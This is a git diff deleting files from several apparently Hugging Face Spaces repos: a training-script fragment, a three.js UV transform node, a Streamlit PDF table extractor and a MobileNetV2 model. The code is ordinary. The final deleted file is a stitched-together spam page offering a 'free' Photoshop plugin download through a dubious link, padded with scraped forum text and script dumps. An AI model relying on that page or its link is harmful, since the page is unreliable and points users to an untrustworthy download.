argparse.ArgumentParser() - parser.add_argument( - "--workspace", type=str, required=True, help="Directory of workspace." - ) - parser.add_argument( - "--config_yaml", - type=str, - required=True, - help="Path of config file for training.", - ) - - parser.add_argument( - "--resume_checkpoint_path", - type=str, - required=True, - default='', - help="Path of pretrained checkpoint for finetuning.", - ) - - args = parser.parse_args() - args.filename = pathlib.Path(__file__).stem - - train(args) \ No newline at end of file diff --git a/spaces/banana-projects/web3d/node_modules/three/examples/js/nodes/utils/UVTransformNode.js b/spaces/banana-projects/web3d/node_modules/three/examples/js/nodes/utils/UVTransformNode.js deleted file mode 100644 index a19149ad0f059f58fd9023dd29e089974cf48fa5..0000000000000000000000000000000000000000 --- a/spaces/banana-projects/web3d/node_modules/three/examples/js/nodes/utils/UVTransformNode.js +++ /dev/null @@ -1,66 +0,0 @@ -/** - * @author sunag / http://www.sunag.com.br/ - */ - -import { ExpressionNode } from '../core/ExpressionNode.js'; -import { Matrix3Node } from '../inputs/Matrix3Node.js'; -import { UVNode } from '../accessors/UVNode.js'; - -function UVTransformNode( uv, position ) { - - ExpressionNode.call( this, "( uvTransform * vec3( uvNode, 1 ) ).xy", "vec2" ); - - this.uv = uv || new UVNode(); - this.position = position || new Matrix3Node(); - -} - -UVTransformNode.prototype = Object.create( ExpressionNode.prototype ); -UVTransformNode.prototype.constructor = UVTransformNode; -UVTransformNode.prototype.nodeType = "UVTransform"; - -UVTransformNode.prototype.generate = function ( builder, output ) { - - this.keywords[ "uvNode" ] = this.uv; - this.keywords[ "uvTransform" ] = this.position; - - return ExpressionNode.prototype.generate.call( this, builder, output ); - -}; - -UVTransformNode.prototype.setUvTransform = function ( tx, ty, sx, sy, rotation, cx, cy ) { - - cx = cx !== undefined ? cx : .5; - cy = cy !== undefined ? cy : .5; - - this.position.value.setUvTransform( tx, ty, sx, sy, rotation, cx, cy ); - -}; - -UVTransformNode.prototype.copy = function ( source ) { - - ExpressionNode.prototype.copy.call( this, source ); - - this.uv = source.uv; - this.position = source.position; - -}; - -UVTransformNode.prototype.toJSON = function ( meta ) { - - var data = this.getJSONNode( meta ); - - if ( ! data ) { - - data = this.createJSONNode( meta ); - - data.uv = this.uv.toJSON( meta ).uuid; - data.position = this.position.toJSON( meta ).uuid; - - } - - return data; - -}; - -export { UVTransformNode }; diff --git a/spaces/beihai/PDF-Table-Extractor/.history/app_20220621102131.py b/spaces/beihai/PDF-Table-Extractor/.history/app_20220621102131.py deleted file mode 100644 index f1837c63e2a0686914592d7ea9ac8cf9a848fe81..0000000000000000000000000000000000000000 --- a/spaces/beihai/PDF-Table-Extractor/.history/app_20220621102131.py +++ /dev/null @@ -1,53 +0,0 @@ -#-*- coding : utf-8-*- -import base64 -from subprocess import STDOUT -import streamlit as st -import pandas as pd -import camelot as cam # extracting tables from PDFs - -st.title("PDF Table Extractor") - -input_pdf = st.file_uploader(label = "", type = 'pdf') - -background = st.selectbox("表格线条是否隐藏",(False,True)) -extractor_mode = st.selectbox("单页抽取 OR 全文抽取",("单页抽取","全文抽取")) - -if input_pdf is not None: - # byte object into a PDF file - with open("input.pdf", "wb") as f: - base64_pdf = base64.b64encode(input_pdf.read()).decode('utf-8') - f.write(base64.b64decode(base64_pdf)) - f.close() - if extractor_mode == "单页抽取": - page_number = st.text_input("请填写表格所在PDF页码,eg: 3", value = 1) - # read the pdf and parse it using stream - tables = cam.read_pdf("input.pdf", pages=page_number, process_background=background) - result = pd.ExcelWriter('result.xlsx', engine='xlsxwriter') - tables[0].to_excel(result,index=False) - # for i in range(0,len(tables)): - # table = tables[i].df - # sheetname = str(i) - # table.to_excel(result, sheetname,index=False) - - with open('result.xlsx','rb') as f: - st.download_button('提取完成,点击下载!', f,file_name='result.xlsx',mime="application/vnd.ms-excel") - if extractor_mode == "全文抽取": - tables_all= cam.read_pdf("input.pdf", pages="all", process_background=background) - result_all = pd.ExcelWriter('result_all.xlsx', engine='xlsxwriter') - for i in range(0,len(tables_all)): - table = tables_all[i].df - sheetname = str(i) - table.to_excel(result_all, sheetname,index=False) - with open('result_all.xlsx','rb') as f: - st.download_button('抽取完成,点击下载!', f,file_name='result_all.xlsx',mime="application/vnd.ms-excel") - - -row9_spacer1, row9_1, row9_spacer2, row9_2, row9_spacer3 = st.columns((.2, 2.3, .4, 4.4, .2)) -with row9_1: - if st.button('单页抽取'): - st.write('单页抽取') -with row9_2: - if st.button('全文抽取'): - st.write('全文抽取') - - diff --git a/spaces/bhasker412/IDD-YOLO-Tracking/trackers/strongsort/deep/models/mobilenetv2.py b/spaces/bhasker412/IDD-YOLO-Tracking/trackers/strongsort/deep/models/mobilenetv2.py deleted file mode 100644 index c451ef84e726ebc8d4c8e47253f335494eb801c9..0000000000000000000000000000000000000000 --- a/spaces/bhasker412/IDD-YOLO-Tracking/trackers/strongsort/deep/models/mobilenetv2.py +++ /dev/null @@ -1,274 +0,0 @@ -from __future__ import division, absolute_import -import torch.utils.model_zoo as model_zoo -from torch import nn -from torch.nn import functional as F - -__all__ = ['mobilenetv2_x1_0', 'mobilenetv2_x1_4'] - -model_urls = { - # 1.0: top-1 71.3 - 'mobilenetv2_x1_0': - 'https://mega.nz/#!NKp2wAIA!1NH1pbNzY_M2hVk_hdsxNM1NUOWvvGPHhaNr-fASF6c', - # 1.4: top-1 73.9 - 'mobilenetv2_x1_4': - 'https://mega.nz/#!RGhgEIwS!xN2s2ZdyqI6vQ3EwgmRXLEW3khr9tpXg96G9SUJugGk', -} - - -class ConvBlock(nn.Module): - """Basic convolutional block. - - convolution (bias discarded) + batch normalization + relu6. - - Args: - in_c (int): number of input channels. - out_c (int): number of output channels. - k (int or tuple): kernel size. - s (int or tuple): stride. - p (int or tuple): padding. - g (int): number of blocked connections from input channels - to output channels (default: 1). - """ - - def __init__(self, in_c, out_c, k, s=1, p=0, g=1): - super(ConvBlock, self).__init__() - self.conv = nn.Conv2d( - in_c, out_c, k, stride=s, padding=p, bias=False, groups=g - ) - self.bn = nn.BatchNorm2d(out_c) - - def forward(self, x): - return F.relu6(self.bn(self.conv(x))) - - -class Bottleneck(nn.Module): - - def __init__(self, in_channels, out_channels, expansion_factor, stride=1): - super(Bottleneck, self).__init__() - mid_channels = in_channels * expansion_factor - self.use_residual = stride == 1 and in_channels == out_channels - self.conv1 = ConvBlock(in_channels, mid_channels, 1) - self.dwconv2 = ConvBlock( - mid_channels, mid_channels, 3, stride, 1, g=mid_channels - ) - self.conv3 = nn.Sequential( - nn.Conv2d(mid_channels, out_channels, 1, bias=False), - nn.BatchNorm2d(out_channels), - ) - - def forward(self, x): - m = self.conv1(x) - m = self.dwconv2(m) - m = self.conv3(m) - if self.use_residual: - return x + m - else: - return m - - -class MobileNetV2(nn.Module): - """MobileNetV2. - - Reference: - Sandler et al. MobileNetV2: Inverted Residuals and - Linear Bottlenecks. CVPR 2018. - - Public keys: - - ``mobilenetv2_x1_0``: MobileNetV2 x1.0. - - ``mobilenetv2_x1_4``: MobileNetV2 x1.4. - """ - - def __init__( - self, - num_classes, - width_mult=1, - loss='softmax', - fc_dims=None, - dropout_p=None, - **kwargs - ): - super(MobileNetV2, self).__init__() - self.loss = loss - self.in_channels = int(32 * width_mult) - self.feature_dim = int(1280 * width_mult) if width_mult > 1 else 1280 - - # construct layers - self.conv1 = ConvBlock(3, self.in_channels, 3, s=2, p=1) - self.conv2 = self._make_layer( - Bottleneck, 1, int(16 * width_mult), 1, 1 - ) - self.conv3 = self._make_layer( - Bottleneck, 6, int(24 * width_mult), 2, 2 - ) - self.conv4 = self._make_layer( - Bottleneck, 6, int(32 * width_mult), 3, 2 - ) - self.conv5 = self._make_layer( - Bottleneck, 6, int(64 * width_mult), 4, 2 - ) - self.conv6 = self._make_layer( - Bottleneck, 6, int(96 * width_mult), 3, 1 - ) - self.conv7 = self._make_layer( - Bottleneck, 6, int(160 * width_mult), 3, 2 - ) - self.conv8 = self._make_layer( - Bottleneck, 6, int(320 * width_mult), 1, 1 - ) - self.conv9 = ConvBlock(self.in_channels, self.feature_dim, 1) - - self.global_avgpool = nn.AdaptiveAvgPool2d(1) - self.fc = self._construct_fc_layer( - fc_dims, self.feature_dim, dropout_p - ) - self.classifier = nn.Linear(self.feature_dim, num_classes) - - self._init_params() - - def _make_layer(self, block, t, c, n, s): - # t: expansion factor - # c: output channels - # n: number of blocks - # s: stride for first layer - layers = [] - layers.append(block(self.in_channels, c, t, s)) - self.in_channels = c - for i in range(1, n): - layers.append(block(self.in_channels, c, t)) - return nn.Sequential(*layers) - - def _construct_fc_layer(self, fc_dims, input_dim, dropout_p=None): - """Constructs fully connected layer. - - Args: - fc_dims (list or tuple): dimensions of fc layers, if None, no fc layers are constructed - input_dim (int): input dimension - dropout_p (float): dropout probability, if None, dropout is unused - """ - if fc_dims is None: - self.feature_dim = input_dim - return None - - assert isinstance( - fc_dims, (list, tuple) - ), 'fc_dims must be either list or tuple, but got {}'.format( - type(fc_dims) - ) - - layers = [] - for dim in fc_dims: - layers.append(nn.Linear(input_dim, dim)) - layers.append(nn.BatchNorm1d(dim)) - layers.append(nn.ReLU(inplace=True)) - if dropout_p is not None: - layers.append(nn.Dropout(p=dropout_p)) - input_dim = dim - - self.feature_dim = fc_dims[-1] - - return nn.Sequential(*layers) - - def _init_params(self): - for m in self.modules(): - if isinstance(m, nn.Conv2d): - nn.init.kaiming_normal_( - m.weight, mode='fan_out', nonlinearity='relu' - ) - if m.bias is not None: - nn.init.constant_(m.bias, 0) - elif isinstance(m, nn.BatchNorm2d): - nn.init.constant_(m.weight, 1) - nn.init.constant_(m.bias, 0) - elif isinstance(m, nn.BatchNorm1d): - nn.init.constant_(m.weight, 1) - nn.init.constant_(m.bias, 0) - elif isinstance(m, nn.Linear): - nn.init.normal_(m.weight, 0, 0.01) - if m.bias is not None: - nn.init.constant_(m.bias, 0) - - def featuremaps(self, x): - x = self.conv1(x) - x = self.conv2(x) - x = self.conv3(x) - x = self.conv4(x) - x = self.conv5(x) - x = self.conv6(x) - x = self.conv7(x) - x = self.conv8(x) - x = self.conv9(x) - return x - - def forward(self, x): - f = self.featuremaps(x) - v = self.global_avgpool(f) - v = v.view(v.size(0), -1) - - if self.fc is not None: - v = self.fc(v) - - if not self.training: - return v - - y = self.classifier(v) - - if self.loss == 'softmax': - return y - elif self.loss == 'triplet': - return y, v - else: - raise KeyError("Unsupported loss: {}".format(self.loss)) - - -def init_pretrained_weights(model, model_url): - """Initializes model with pretrained weights. - - Layers that don't match with pretrained layers in name or size are kept unchanged. - """ - pretrain_dict = model_zoo.load_url(model_url) - model_dict = model.state_dict() - pretrain_dict = { - k: v - for k, v in pretrain_dict.items() - if k in model_dict and model_dict[k].size() == v.size() - } - model_dict.update(pretrain_dict) - model.load_state_dict(model_dict) - - -def mobilenetv2_x1_0(num_classes, loss, pretrained=True, **kwargs): - model = MobileNetV2( - num_classes, - loss=loss, - width_mult=1, - fc_dims=None, - dropout_p=None, - **kwargs - ) - if pretrained: - # init_pretrained_weights(model, model_urls['mobilenetv2_x1_0']) - import warnings - warnings.warn( - 'The imagenet pretrained weights need to be manually downloaded from {}' - .format(model_urls['mobilenetv2_x1_0']) - ) - return model - - -def mobilenetv2_x1_4(num_classes, loss, pretrained=True, **kwargs): - model = MobileNetV2( - num_classes, - loss=loss, - width_mult=1.4, - fc_dims=None, - dropout_p=None, - **kwargs - ) - if pretrained: - # init_pretrained_weights(model, model_urls['mobilenetv2_x1_4']) - import warnings - warnings.warn( - 'The imagenet pretrained weights need to be manually downloaded from {}' - .format(model_urls['mobilenetv2_x1_4']) - ) - return model diff --git a/spaces/bioriAsaeru/text-to-voice/Adobe Photoshop Cs5 Camera Raw Plugin A Must-Have for Mac Users.md b/spaces/bioriAsaeru/text-to-voice/Adobe Photoshop Cs5 Camera Raw Plugin A Must-Have for Mac Users.md deleted file mode 100644 index 60e24d714e45cb1ebada1e72f256844d670f29c2..0000000000000000000000000000000000000000 --- a/spaces/bioriAsaeru/text-to-voice/Adobe Photoshop Cs5 Camera Raw Plugin A Must-Have for Mac Users.md +++ /dev/null @@ -1,6 +0,0 @@ -
      -

      That camera requires Camera Raw 8.7 or later (or Lightroom 5.7). The last version of Camera Raw supported in CS5 was 6.7. So Richard is correct. You will either need to update to CS6 or newer in order to run a more recent version of the ACR plugin, or you will need to use the free DNG Converter utility to convert your files to DNG before importing.

      -

      Adobe Photoshop Cs5 Camera Raw Plugin Free Download Mac


      Download · https://urloso.com/2uyQh0



      -

      I have purchased new camera, a Nikon D750, and nowmy Photoshop version CS5.1 with the cameraw rawplug-in version 6.7 doesn't support the files from it.Which version of the raw converter plug-in can I installto tackel this problem?","isUseLiaRichMedia":false,"autoTitleLink":" _0.form.messageeditor.tinymceeditor:getautotitle?t:ac=board-id/camera-raw/message-id/3713/thread-id/3713","isGteEditorV2":true,"linkTooltipTexts":"bareURL":"Bare URL","unlink":"Unlink","openLink":"Open link","autoTitle":"Auto-title","elementSelector":"#tinyMceEditor_10d320c281327d9","preLoadedAddOnAssetUrls":["/html/js/lib/tinymce/4.7.13/themes/modern/theme.js","/html/js/lib/tinymce/4.7.13/plugins/lists/plugin.js","/html/js/lib/tinymce/4.7.13/plugins/compat3x/plugin.js","/html/js/lib/tinymce/4.7.13/plugins/image/plugin.js","/html/js/lib/tinymce/4.7.13/plugins/link/plugin.js","/html/js/lib/tinymce/4.7.13/plugins/textcolor/plugin.js","/html/js/lib/tinymce/4.7.13/plugins/table/plugin.js","/html/js/lib/tinymce/4.7.13/plugins/tabfocus/plugin.js","/html/js/lib/tinymce/4.7.13/plugins/paste/plugin.js","/plugin/editors/tinymce/plugins/spoiler/plugin.js","/plugin/editors/tinymce/plugins/spoiler/langs/en.js","/plugin/editors/tinymce/plugins/insertcode/plugin.js","/plugin/editors/tinymce/plugins/insertcode/langs/en.js","/html/js/lib/tinymce/4.7.13/plugins/advlist/plugin.js","/html/js/lib/tinymce/4.7.13/plugins/autolink/plugin.js","/plugin/editors/tinymce/plugins/liarichmedia/plugin.js","/plugin/editors/tinymce/plugins/liarichmedia/langs/en.js","/plugin/editors/tinymce/plugins/liaexpandtoolbar/plugin.js","/plugin/editors/tinymce/plugins/liaexpandtoolbar/langs/en.js","/html/js/lib/tinymce/4.7.13/plugins/codesample/plugin.js","/plugin/editors/tinymce/plugins/liaquote/plugin.js","/plugin/editors/tinymce/plugins/liaquote/langs/en.js","/plugin/editors/tinymce/plugins/liamacros/plugin.js","/plugin/editors/tinymce/plugins/liamacros/langs/en.js","/plugin/editors/tinymce/plugins/liafullscreendone/plugin.js","/plugin/editors/tinymce/plugins/liafullscreendone/langs/en.js","/html/js/lib/tinymce/4.7.13/plugins/code/plugin.js","/plugin/editors/tinymce/plugins/mentions/plugin.js","/plugin/editors/tinymce/plugins/mentions/langs/en.js","/html/js/lib/tinymce/4.7.13/plugins/noneditable/plugin.js","/plugin/editors/tinymce/plugins/emoticons/plugin.js","/plugin/editors/tinymce/plugins/emoticons/langs/en.js","/plugin/editors/tinymce/plugins/spellchecker/plugin.js"],"isOoyalaVideoEnabled":false,"isInlineLinkEditingEnabled":true,"optionsParam":"messageMentionTemplate":"#title","spellcheckerUrl":"/spellchecker/lucene","useUserMentions":true,"toolbarSelector":".mce-toolbar-grp","useProductMentions":false,"mediaUploadOptions":"attachmentOverlayText":"Drop your files here","createVideoLink":" _0.form.messageeditor.tinymceeditor:createvideo?t:ac=board-id/camera-raw/message-id/3713/thread-id/3713","imageUploadSettings":"validImageExts":"*.jpg;*.JPG;*.jpeg;*.JPEG;*.gif;*.GIF;*.png;*.PNG","maxFileBytes":10264576,"maxImagesPerUpload":10,"editorOverlayText":"Drop your media files here","copyPasteSettings":"copyPasteEvent":"LITHIUM:liaCopyPasteImages","copyPasteBatchSize":3,"copyPasteCss":"lia-copypaste-placeholder","username":"Deleted User","videoImageTooltip":"\"Please wait while we upload and process your video. This may take a few minutes, so please check back later.\"","enableFormActionButtonsEvent":"LITHIUM:enableFormActionButtons","videoUploadingUrlsLink":" _0.form.messageeditor.tinymceeditor:videouploadingurls?t:ac=board-id/camera-raw/message-id/3713/thread-id/3713","isOverlayVisible":true,"videoEmbedThumbnail":"/i/skins/default/video-loading-new.gif","videoStatusUpdateLink":" _0.form.messageeditor.tinymceeditor:videostatusupdate?t:ac=board-id/camera-raw/message-id/3713/thread-id/3713","token":"AbIrFQVGieDCrG9mGnamfMG0SWvPCzRLM1Y50aSGCZo.","defaultAlbumId":1,"imageFormatFeedbackErrorContainer":".lia-file-error-msg","fileUploadSelector":".lia-file-upload","isCanUploadImages":false,"videoUploadSettings":"maxFileBytes":512000000,"validVideoExts":".wmv;.avi;.mov;.moov;.mpg;.mpeg;.m2t;.m2v;.vob;.flv;.mp4;.mpg4;.mkv;.asf;.m4v;.m2p;.3gp;.3g2;.f4v;.mp3;.m4a;.wma;.aac","disableFormActionButtonsEvent":"LITHIUM:disableFormActionButtons","isOoyalaVideoEnabled":false,"videoEmbedSizes":"small":"width":200,"height":150,"original":"width":400,"height":300,"large":"width":600,"height":450,"medium":"width":400,"height":300,"isMobileDevice":false,"removeAllOverlays":"LITHIUM:removeAllOverlays","isCanUploadVideo":false,"passToAttachmentEvent":"LITHIUM:passToAttachment","imageUrlPattern":" -id//image-size/?v=v2&px=-1","useMessageMentions":false,"spellcheckerLangs":"English (US)=en,Spanish=es,Portuguese=pt,German=de,French=fr,Arabic=ar","mentionsVersion":"2","iframeTitle":"Body Rich Text Area. Press ALT-F10 for toolbar and Escape to return to the editor.","events":"editorPasteEvent":"LITHIUM:editorPaste","editorLoadedEvent":"LITHIUM:editorLoaded","useGraphicalEditor":true});LITHIUM.InformationBox("updateFeedbackEvent":"LITHIUM:updateAjaxFeedback","componentSelector":"#informationbox_10d320c281327d9_30","feedbackSelector":".InfoMessage");LITHIUM.Text.set("ajax.createUrlSnippet.loader.feedback.title":"Loading...");LITHIUM.AjaxSupport("ajaxOptionsParam":"useLoader":true,"event":"LITHIUM:createUrlSnippet","tokenId":"ajax","elementSelector":"#messagepresnippet_10d320c281327d9","action":"createUrlSnippet","feedbackSelector":"#messagepresnippet_10d320c281327d9","url":" _0.form.messageeditor.messagepresnippet:createurlsnippet?t:ac=board-id/camera-raw/message-id/3713/thread-id/3713","ajaxErrorEventName":"LITHIUM:ajaxError","token":"fXZZYgZ1h4bCALwi4vGgibsZYIGvmVnpOHyz81uznJE.");LITHIUM.MessagePreSnippet("pasteEvent":"LITHIUM:editorPaste","maxUrlListSize":10,"snippetExistsTextClass":"lia-media-snippet-preview-exists","tinyMceSelector":"#messageEditor_10d320c281327d9_0","messageSnippetEvent":"LITHIUM:createUrlSnippet","elementSelector":"#messagepresnippet_10d320c281327d9","snippetUpdateEvent":"LITHIUM:updateUrlSnippet","urlFormFieldSelector":".lia-form-media-snippet-url-input","snippetCloseEvent":"LITHIUM:closeUrlSnippet");LITHIUM.BlockEvents('.lia-js-block-events', [".lia-spoiler-link",".oo-icon",".oo-volume-bar",".oo-close-button"], '.message-preview');LITHIUM.KeepSessionAlive("/t5/status/blankpage?keepalive", 300000);new LITHIUM.MessageEditor("previewButtonSelector":"#previewButton_10d320c281327d9","defaultTabSelector":".rich-link","defaultTabName":"rich","usesInlinePreview":true,"formHasErrorsEvent":"LITHIUM:formHasErrors","exitPreviewButtonSelector":"#exitPreviewButton_10d320c281327d9","isTabsPresent":false,"ajaxCompleteEvent":"LITHIUM:ajaxComplete","isGteEditorV2":true,"previewSubmitElementSelector":"#submitContext_10d320c281327d9","tinyMceElementSelector":"#tinyMceEditor_10d320c281327d9","elementSelector":"#messageEditor_10d320c281327d9_0","macroChangeEvent":"LITHIUM:change-macro","preExitPreviewEvent":"LITHIUM:refreshAttachments");LITHIUM.MessageEditor.MessageQuote("#messageQuote_10d320c281327d9", "#tinyMceEditor_10d320c281327d9", " wrote:
      I have purchased new camera, a Nikon D750, and nowmy Photoshop version CS5.1 with the cameraw rawplug-in version 6.7 doesn't support the files from it.Which version of the raw converter plug-in can I installto tackel this problem?", true);LITHIUM.FileDragDrop("urls":"uploadUrl":" _0.form.attachmentscomponent:uploadfileaction/attachments-key/b66beb9f-1d84-4ee2-9b3f-8d6be6111d5e?t:ac=board-id/camera-raw/message-id/3713/thread-id/3713","selectors":"container":"#filedragdrop_10d320c281327d9","feedbackElement":"#dragDropFeedback .AjaxFeedback","cancelUploadProgress":"lia-remove-attachment-inprogress","fileUpload":"#filedragdrop_10d320c281327d9 .lia-file-upload","events":"uploadDoneEvent":"LITHIUM:uploadDone","refreshAttachmentsEvent":"LITHIUM:refreshAttachments","formHasErrorsEvent":"LITHIUM:formHasErrors","misc":"actionTokenId":"uploadFile","fileDataParam":"Filedata","isEditorGteV2":true,"actionToken":"qeLVzw5ACoAQjen5PFhEX4jf4WOj79RA5UVr_EIqhMU.");LITHIUM.InformationBox("updateFeedbackEvent":"LITHIUM:updateAjaxFeedback","componentSelector":"#informationbox_10d320c281327d9_31","feedbackSelector":".InfoMessage");LITHIUM.AjaxSupport("ajaxOptionsParam":"event":"LITHIUM:refreshAttachments","parameters":"clientId":"inlinemessagereplyeditor_0_10d320c281327d9","attachmentKey":"b66beb9f-1d84-4ee2-9b3f-8d6be6111d5e","tokenId":"ajax","elementSelector":"#inlinemessagereplyeditor_0_10d320c281327d9","action":"refreshAttachments","feedbackSelector":"#attachmentsComponent_10d320c281327d9","url":" _0.form.attachmentscomponent:refreshattachments?t:ac=board-id/camera-raw/message-id/3713/thread-id/3713","ajaxErrorEventName":"LITHIUM:ajaxError","token":"beGQZHExkDhS0c1J2hTQcAKXeTwXcgEsn6xo-2I8CyY.");LITHIUM.AjaxSupport("ajaxOptionsParam":"event":"LITHIUM:removeNewAttachment","parameters":"clientId":"inlinemessagereplyeditor_0_10d320c281327d9","attachmentKey":"b66beb9f-1d84-4ee2-9b3f-8d6be6111d5e","tokenId":"ajax","elementSelector":"#inlinemessagereplyeditor_0_10d320c281327d9 .lia-file-upload","action":"removeNewAttachment","feedbackSelector":"#attachmentsComponent_10d320c281327d9","url":" _0.form.attachmentscomponent:removenewattachment?t:ac=board-id/camera-raw/message-id/3713/thread-id/3713","ajaxErrorEventName":"LITHIUM:ajaxError","token":"V2YvavrnbVvLNl3gBZ0qivIbEPud_xbOiVsAljV9LB0.");LITHIUM.AjaxSupport("ajaxOptionsParam":"event":"LITHIUM:removePreviewAttachment","parameters":"clientId":"inlinemessagereplyeditor_0_10d320c281327d9","attachmentKey":"b66beb9f-1d84-4ee2-9b3f-8d6be6111d5e","tokenId":"ajax","elementSelector":"#inlinemessagereplyeditor_0_10d320c281327d9 .lia-file-upload","action":"removePreviewAttachment","feedbackSelector":"#attachmentsComponent_10d320c281327d9","url":" _0.form.attachmentscomponent:removepreviewattachment?t:ac=board-id/camera-raw/message-id/3713/thread-id/3713","ajaxErrorEventName":"LITHIUM:ajaxError","token":"Tn8m8UyACMA8k5IP8_XUxpYMFlB1kbJtr0rAjRXsRco.");LITHIUM.AjaxSupport("ajaxOptionsParam":"event":"LITHIUM:removeExistingAttachment","parameters":"clientId":"inlinemessagereplyeditor_0_10d320c281327d9","attachmentKey":"b66beb9f-1d84-4ee2-9b3f-8d6be6111d5e","tokenId":"ajax","elementSelector":"#inlinemessagereplyeditor_0_10d320c281327d9 .lia-file-upload","action":"removeExistingAttachment","feedbackSelector":"#attachmentsComponent_10d320c281327d9","url":" _0.form.attachmentscomponent:removeexistingattachment?t:ac=board-id/camera-raw/message-id/3713/thread-id/3713","ajaxErrorEventName":"LITHIUM:ajaxError","token":"Pw_QHHRXKDfB_1VqOGqQL0yo0IVT_QGHid-pVOp1b9U.");LITHIUM.AjaxSupport("ajaxOptionsParam":"event":"LITHIUM:removeInProgressNewAttachment","parameters":"clientId":"inlinemessagereplyeditor_0_10d320c281327d9","attachmentKey":"b66beb9f-1d84-4ee2-9b3f-8d6be6111d5e","tokenId":"ajax","elementSelector":"#inlinemessagereplyeditor_0_10d320c281327d9 .lia-file-upload","action":"removeInProgressNewAttachment","feedbackSelector":"#attachmentsComponent_10d320c281327d9","url":" _0.form.attachmentscomponent:removeinprogressnewattachment?t:ac=board-id/camera-raw/message-id/3713/thread-id/3713","ajaxErrorEventName":"LITHIUM:ajaxError","token":"2tSIEsK2ELWA84pTiYIDTxUKZSUKx2xExpsCxHZF2Gw.");LITHIUM.DragDropAttachmentsComponent("fileSizeErrorText":"The file () exceeds the maximum file size. The maximum file size is 47 MB.","validExts":"8bf, abf, abr, act, aep, afm, ai, arw, as, ase, avi, bmp, book, cel, cfc, chproj, cptx, cr2, cr3, crf, crw, css, csv, dn, dng, doc, docx, eps, epub, exif, fbx, fla, flac, flv, fm, gif, icma, icml, ico, ics, idml, indd, jpeg, jpg, jsfl, json, log, loss, lrcat, lrtemplate, m4a, mif, mov, mp3, mp4, mpg, nef, nrw, obj, odt, orf, otc, otf, pdf, pfb, pfm, pmd, png, ppj, ppt, pptx, prc, prel, prproj, ps, psb, psd, raf, raw, rtf, sbs, sbsar, sbsm, scc, ses, sesx, skp, sol, srt, srw, ssa, stl, svg, swf, tif, ttc, ttf, txt, wav, wmv, x3f, xd, xls, xlsx, xml, xmp","dropZoneSelector":"#inlinemessagereplyeditor_0_10d320c281327d9 .lia-attachments-drop-zone","uploadingText":"Uploading...","changeNumAttachmentsEvent":"LITHIUM:changeNumAttachments","storageUnitKB":"KB","currAttachments":0,"removeNewAttachmentSelector":"#inlinemessagereplyeditor_0_10d320c281327d9 .lia-remove-attachment","removeInProgressNewAttachment":"LITHIUM:removeInProgressNewAttachment","elementSelector":"#inlinemessagereplyeditor_0_10d320c281327d9","maxAttachments":10,"removeAllOverlays":"LITHIUM:removeAllOverlays","inProgressAttachmentsContainerSelector":"#inlinemessagereplyeditor_0_10d320c281327d9 .lia-in-progress-attachments","removeExistingAttachmentEvent":"LITHIUM:removeExistingAttachment","inputFieldSelector":".lia-form-type-file.lia-form-type-file-hidden","dropFilesHereText":"attachments.overlay.text","enableFormActionButtonsEvent":"LITHIUM:enableFormActionButtons","maxFileSize":50000000,"tooManyAttachmentsMsg":"The maximum number of attachments has been reached. Maximum number of attachments allowed is: 10","attachmentErrorSelector":"#inlinemessagereplyeditor_0_10d320c281327d9 .lia-file-error-msg","cancelAttachmentProgressCss":"lia-remove-attachment-inprogress","fileUploadSelector":"#inlinemessagereplyeditor_0_10d320c281327d9 .lia-file-upload","newAttachmentSelector":"#inlinemessagereplyeditor_0_10d320c281327d9 .lia-new-attachment","attachmentsTooManyErrorSelector":"#inlinemessagereplyeditor_0_10d320c281327d9 .lia-attachment-upload-error-many","fileTypeErrorText":"The file type () is not supported. Valid file types are: 8bf, abf, abr, act, aep, afm, ai, arw, as, ase, avi, bmp, book, cel, cfc, chproj, cptx, cr2, cr3, crf, crw, css, csv, dn, dng, doc, docx, eps, epub, exif, fbx, fla, flac, flv, fm, gif, icma, icml, ico, ics, idml, indd, jpeg, jpg, jsfl, json, log, loss, lrcat, lrtemplate, m4a, mif, mov, mp3, mp4, mpg, nef, nrw, obj, odt, orf, otc, otf, pdf, pfb, pfm, pmd, png, ppj, ppt, pptx, prc, prel, prproj, ps, psb, psd, raf, raw, rtf, sbs, sbsar, sbsm, scc, ses, sesx, skp, sol, srt, srw, ssa, stl, svg, swf, tif, ttc, ttf, txt, wav, wmv, x3f, xd, xls, xlsx, xml, xmp.","uploadDoneEvent":"LITHIUM:uploadDone","disableFormActionButtonsEvent":"LITHIUM:disableFormActionButtons","inProgressAttachmentSelector":".lia-in-progress-attachment","removePreviewAttachmentEvent":"LITHIUM:removePreviewAttachment","removeNewAttachmentEvent":"LITHIUM:removeNewAttachment","passToAttachmentEvent":"LITHIUM:passToAttachment");LITHIUM.InformationBox("updateFeedbackEvent":"LITHIUM:updateAjaxFeedback","componentSelector":"#informationbox_10d320c281327d9_32","feedbackSelector":".InfoMessage");LITHIUM.Form.resetFieldForFocusFound();LITHIUM.Text.set("ajax.InlineMessageReply.loader.feedback.title":"Loading...");LITHIUM.AjaxSupport.fromForm('#form_10d320c281327d9', 'InlineMessageReply', '#ajaxFeedback_10d320c281327d9_0', 'LITHIUM:ajaxError', "useLoader":false,"ignoreFormActions":["Cancel","SaveDraft"],"event":"submit","httpMethod":"POST", false);LITHIUM.InputEditForm("form_10d320c281327d9", "submitButton":".lia-button-Submit-action","enableFormButtonEvent":"LITHIUM:enableFormButton","warnUnsavedDataActionCssClasses":["lia-form-action-ignore-unsaved-data","lia-button-Cancel-action"],"useUnsavedDataWarning":true,"ignoreDisableFormDuringSubmitCssClasses":[],"submitOnChange":false,"swallowEnterEvent":true,"enableFormEvent":"LITHIUM:enableForm","disableFormButtonEvent":"LITHIUM:disableFormButton","disableFormEvent":"LITHIUM:disableForm","unloadMessage":"Unsaved information will be lost.","ignoreOnChangeCssClasses":[],"disableFormOnSubmit":true,"buttonWrapperSelector":".lia-button-wrapper","showUnsavedDataWarningDataKey":"showUnsavedDataWarning","liaBodyTagId":"#lia-body");LITHIUM.AjaxSupport("ajaxOptionsParam":"event":"LITHIUM:autosaveInline","parameters":"clientId":"inlinemessagereplyeditor_0_10d320c281327d9","tokenId":"ajax","elementSelector":"#form_10d320c281327d9","action":"autosaveInline","feedbackSelector":"#form_10d320c281327d9","url":" _0.form:autosaveinline?t:ac=board-id/camera-raw/message-id/3713/thread-id/3713","ajaxErrorEventName":"LITHIUM:ajaxError","token":"z9J8heIW06FBZRezMoBwfS4yiMJYmdlSifDzT8yOfVE.");LITHIUM.InlineMessageReplyEditor("openEditsSelector":".lia-inline-message-edit","ajaxFeebackSelector":"#inlinemessagereplyeditor_0_10d320c281327d9 .lia-inline-ajax-feedback","collapseEvent":"LITHIUM:collapseInlineMessageEditor","confimationText":"You have other message editors open and your data inside 